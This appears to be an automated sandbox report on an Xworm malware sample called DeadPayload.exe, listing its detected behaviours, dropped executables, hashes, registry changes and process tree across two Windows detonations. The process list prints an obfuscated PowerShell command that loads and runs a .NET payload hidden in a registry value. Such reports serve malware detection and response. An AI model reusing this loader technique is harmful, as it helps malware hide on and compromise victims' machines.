Analysis Overview
SHA256
0287c741bae11fcfebf9f7d81b1f663379f531855ef381faecdc006ef689c25c
Threat Level: Known bad
The file DeadPayload.exe was found to be: Known bad.
Malicious Activity Summary
Xworm
Detect Xworm Payload
Suspicious use of NtCreateUserProcessOtherParentProcess
Xworm family
Modifies security service
Sets service image path in registry
Checks computer location settings
Checks BIOS information in registry
Executes dropped EXE
Command and Scripting Interpreter: PowerShell
Suspicious use of SetThreadContext
Drops file in System32 directory
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Unsigned PE
Modifies data under HKEY_USERS
Suspicious use of AdjustPrivilegeToken
Checks SCSI registry key(s)
Checks processor information in registry
Enumerates system info in registry
Modifies registry class
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of UnmapMainImage
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-31 03:27
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-31 03:27
Reported
2024-10-31 03:30
Platform
win7-20240903-en
Max time kernel
150s
Max time network
17s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies security service
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP | C:\Windows\System32\svchost.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection | C:\Windows\System32\svchost.exe | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2072 created 428 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Xworm
Xworm family
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\DeadMan.exe | N/A |
| N/A | N/A | C:\Users\Public\DeadRoot.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2072 set thread context of 2692 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Public\DeadRoot.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 008495e4442bdb01 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Public\DeadMan.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\taskhost.exe
"taskhost.exe"
C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\system32\sppsvc.exe
C:\Windows\system32\sppsvc.exe
C:\Users\Admin\AppData\Local\Temp\DeadPayload.exe
"C:\Users\Admin\AppData\Local\Temp\DeadPayload.exe"
C:\Users\Public\DeadMan.exe
"C:\Users\Public\DeadMan.exe"
C:\Users\Public\DeadRoot.exe
"C:\Users\Public\DeadRoot.exe"
C:\Windows\system32\taskeng.exe
taskeng.exe {912D90F6-8C3A-4991-A213-11C5EA122625} S-1-5-18:NT AUTHORITY\System:Service:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+[Char](70)+'T'+'W'+'A'+'R'+''+[Char](69)+'').GetValue(''+'D'+''+[Char](101)+''+[Char](97)+''+'d'+'s'+[Char](116)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1426204879-12045989041528601166-663992467725422111-1871024949-1871114557-774059290"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{6c6dc1d8-c8de-46c9-ac92-35d67c8d52eb}
Network
Files
memory/2872-0-0x000007FEF57C3000-0x000007FEF57C4000-memory.dmp
memory/2872-1-0x00000000008F0000-0x0000000000974000-memory.dmp
C:\Users\Public\DeadMan.exe
| MD5 | de5bb947d72f5167c12b02f85cb0ef32 |
| SHA1 | cb5b5b754e196ec3072816cb6e250d7dd703752b |
| SHA256 | 66f4ceed7b605df523601dc9a35ccf271be390f4c1d12772c6a047ea970081cd |
| SHA512 | 26763a5ffc87a77b7e25687d900d32baf67c9e45e51a970c683dc1499c37c52b83b5757c3929cf117af8c5fd494491e063fdf88be9609867bd98379d06e83c33 |
memory/1832-8-0x0000000000B00000-0x0000000000B0E000-memory.dmp
memory/1832-9-0x000007FEF57C0000-0x000007FEF61AC000-memory.dmp
C:\Users\Public\DeadRoot.exe
| MD5 | b8479a23c22cf6fc456e197939284069 |
| SHA1 | b2d98cc291f16192a46f363d007e012d45c63300 |
| SHA256 | 18294ee5a6383a48d1bcf2703f17d815529df3a17580e027c3efea1800900e8f |
| SHA512 | 786cd468ce3723516dc869b09e008ec5d35d1f0c1a61e70083a3be15180866be637bd7d8665c2f0218c56875a0ee597c277e088f77dd403bdd2182d06bad3bd4 |
memory/2072-14-0x0000000019FB0000-0x000000001A292000-memory.dmp
memory/2072-15-0x0000000000970000-0x0000000000978000-memory.dmp
memory/2072-16-0x0000000001490000-0x00000000014B8000-memory.dmp
memory/2072-18-0x00000000770D0000-0x00000000771EF000-memory.dmp
memory/2072-17-0x00000000771F0000-0x0000000077399000-memory.dmp
memory/2692-22-0x0000000140000000-0x0000000140008000-memory.dmp
memory/2692-21-0x0000000140000000-0x0000000140008000-memory.dmp
memory/2692-20-0x0000000140000000-0x0000000140008000-memory.dmp
memory/2692-19-0x0000000140000000-0x0000000140008000-memory.dmp
memory/2692-26-0x00000000770D0000-0x00000000771EF000-memory.dmp
memory/428-33-0x0000000000440000-0x0000000000467000-memory.dmp
memory/428-42-0x0000000037230000-0x0000000037240000-memory.dmp
memory/428-41-0x000007FEBDFA0000-0x000007FEBDFB0000-memory.dmp
memory/428-40-0x0000000000440000-0x0000000000467000-memory.dmp
memory/428-34-0x0000000000440000-0x0000000000467000-memory.dmp
memory/428-32-0x0000000000270000-0x0000000000292000-memory.dmp
memory/428-30-0x0000000000270000-0x0000000000292000-memory.dmp
memory/2692-27-0x0000000140000000-0x0000000140008000-memory.dmp
memory/2692-25-0x00000000771F0000-0x0000000077399000-memory.dmp
memory/2692-24-0x0000000140000000-0x0000000140008000-memory.dmp
memory/472-56-0x0000000037230000-0x0000000037240000-memory.dmp
memory/472-55-0x000007FEBDFA0000-0x000007FEBDFB0000-memory.dmp
memory/488-70-0x0000000037230000-0x0000000037240000-memory.dmp
memory/488-69-0x000007FEBDFA0000-0x000007FEBDFB0000-memory.dmp
memory/488-68-0x0000000000120000-0x0000000000147000-memory.dmp
memory/488-62-0x0000000000120000-0x0000000000147000-memory.dmp
memory/472-54-0x0000000000130000-0x0000000000157000-memory.dmp
memory/472-48-0x0000000000130000-0x0000000000157000-memory.dmp
memory/496-76-0x0000000000510000-0x0000000000537000-memory.dmp
memory/1832-182-0x000007FEF57C0000-0x000007FEF61AC000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-31 03:27
Reported
2024-10-31 03:31
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
143s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4264 created 632 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Xworm
Xworm family
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\DeadPayload.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\DeadMan.exe | N/A |
| N/A | N/A | C:\Users\Public\DeadRoot.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4264 set thread context of 4228 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Public\DeadRoot.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\System32\mousocoreworker.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property | C:\Windows\System32\mousocoreworker.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\00188010B00B94CE = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000af77a734f021914b86e7630dbdd433b70000000002000000000010660000000100002000000064400c9f52bf911184c247316eb2089458c22483f8439fd36731e6105772c9cc000000000e80000000020000200000003d5bf4ac38ac9dd24b7d25c3cae7b2311ec5854283764cb55d67fd4c5d0266338000000082638b75543c4f4e18c9fd991e6be39c288498e8d284fcb48a3e9fcf0966a1357866b783c307c90187d2d471bf3b14b926de4461d412ad7fa9acaa6b3c1a96cd2599fc25fd4f04eb6ae9a53a7eef068b781935a5a5fb0d26ab27f4c38a4e331b55b037eb1e0e8415b5faba25c5732856d57c930b86f6d854b03e7b8baa817d2c400000003fa2ab99755aabe1238b2141e380cfd30f95bd8f3f198664efab1c346176ae921b3bbd0ee58843b951cc0ceee21bf494262843f132e9771c7ab59690210b55e5 | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager | C:\Windows\System32\mousocoreworker.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Thu, 31 Oct 2024 03:30:02 GMT" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek\CacheStore | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414} | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "00188010B00B94CE" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1" | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
